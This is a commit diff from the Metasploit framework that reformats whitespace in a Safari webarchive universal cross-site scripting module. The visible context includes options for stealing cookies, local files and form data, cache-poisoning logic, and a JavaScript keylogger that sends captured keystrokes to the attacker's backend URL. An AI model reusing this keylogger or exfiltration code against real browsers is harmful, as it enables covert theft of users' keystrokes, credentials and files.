Skip to content

Commit ca6d6fb

Browse files
author
Tod Beardsley
committed
msftidy for whitespace
1 parent 16769a9 commit ca6d6fb

File tree

1 file changed

+13
-16
lines changed

1 file changed

+13
-16
lines changed

modules/auxiliary/gather/apple_safari_webarchive_uxss.rb

Lines changed: 13 additions & 16 deletions
Original file line numberDiff line numberDiff line change
@@ -51,12 +51,9 @@ def initialize(info = {})
5151
OptString.new('FILE_URLS', [false, 'Additional file:// URLs to steal.', '']),
5252
OptBool.new('STEAL_COOKIES', [true, "Enable cookie stealing.", true]),
5353
OptBool.new('STEAL_FILES', [true, "Enable local file stealing.", true]),
54-
OptBool.new('INSTALL_KEYLOGGERS', [true, "Attempt to poison the user's cache "+
55-
"with a javascript keylogger.", true]),
54+
OptBool.new('INSTALL_KEYLOGGERS', [true, "Attempt to poison the user's cache with a javascript keylogger.", true]),
5655
OptBool.new('STEAL_FORM_DATA', [true, "Enable form autofill stealing.", true]),
57-
58-
OptBool.new('ENABLE_POPUPS', [false, "Enable the popup window fallback method for"+
59-
" stealing form data.", true])
56+
OptBool.new('ENABLE_POPUPS', [false, "Enable the popup window fallback method for stealing form data.", true])
6057
],
6158
self.class)
6259
end
@@ -163,7 +160,7 @@ def start_http(opts={})
163160
def on_request_uri(cli, request)
164161
begin
165162
data = if request.body.size > 0
166-
request.body
163+
request.body
167164
else
168165
request.qstring['data']
169166
end
@@ -186,7 +183,7 @@ def webarchive_xml
186183
def webarchive_header
187184
%Q|
188185
<?xml version="1.0" encoding="UTF-8"?>
189-
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
186+
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
190187
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
191188
<plist version="1.0">
192189
<dict>
@@ -254,7 +251,7 @@ def webarchive_resources_for_poisoning_cache(url)
254251
scripts = scripts_to_poison[url_idx] || []
255252
xml_dicts = scripts.map do |script|
256253
script_body = inject_js_keylogger(script[:body])
257-
puts
254+
puts
258255
%Q|
259256
<dict>
260257
<key>WebResourceData</key>
@@ -293,8 +290,8 @@ def web_response_xml(script)
293290
# this is a binary plist, but im too lazy to write a real encoder.
294291
# ripped this straight out of a safari webarchive save.
295292
script['content-length'] = script[:body].length
296-
whitelist = %w(content-type content-length date etag
297-
Last-Modified cache-control expires)
293+
whitelist = %w(content-type content-length date etag
294+
Last-Modified cache-control expires)
298295
headers = script.clone.delete_if { |k, v| not whitelist.include? k }
299296

300297
key_set = headers.keys.sort
@@ -612,7 +609,7 @@ def steal_form_data_for_url(url)
612609
var iframe = tryInIframe();
613610
if (#{should_pop_up?}) {
614611
window.setTimeout(function(){
615-
612+
616613
if (iframe.contentDocument &&
617614
iframe.contentDocument.location.href == 'about:blank') {
618615
tryInNewWin();
@@ -670,7 +667,7 @@ def inject_js_keylogger(original_js)
670667
data = JSON.stringify({keystrokes: keystrokes, time: time});
671668
img.src = '#{backend_url}#{collect_data_uri}?data='+data;
672669
}
673-
document.addEventListener('keydown', function(e) {
670+
document.addEventListener('keydown', function(e) {
674671
var c = String.fromCharCode(e.keyCode);
675672
if (c.length > 0) buffer += c;
676673
}, true);
@@ -743,8 +740,8 @@ def find_cached_scripts
743740
etag = io.meta['etag']
744741
# lets see if we are able to "poison" the cache for this asset...
745742
if (!expires.nil? && Time.now < expires) or
746-
(cache_control.length > 0) or # if asset is cacheable
747-
(not last_modified.nil? and last_modified.to_s.length > 0)
743+
(cache_control.length > 0) or # if asset is cacheable
744+
(not last_modified.nil? and last_modified.to_s.length > 0)
748745
print_status("Found cacheable #{url}")
749746
io.meta.merge(:body => io.read, :url => url)
750747
else
@@ -807,8 +804,8 @@ def urls
807804
# @return [String] input with dangerous chars replaced with xml entities
808805
def escape_xml(input)
809806
input.to_s.gsub("&", "&amp;").gsub("<", "&lt;")
810-
.gsub(">", "&gt;").gsub("'", "&apos;")
811-
.gsub("\"", "&quot;")
807+
.gsub(">", "&gt;").gsub("'", "&apos;")
808+
.gsub("\"", "&quot;")
812809
end
813810

814811
def should_steal_cookies?

0 commit comments

Comments
 (0)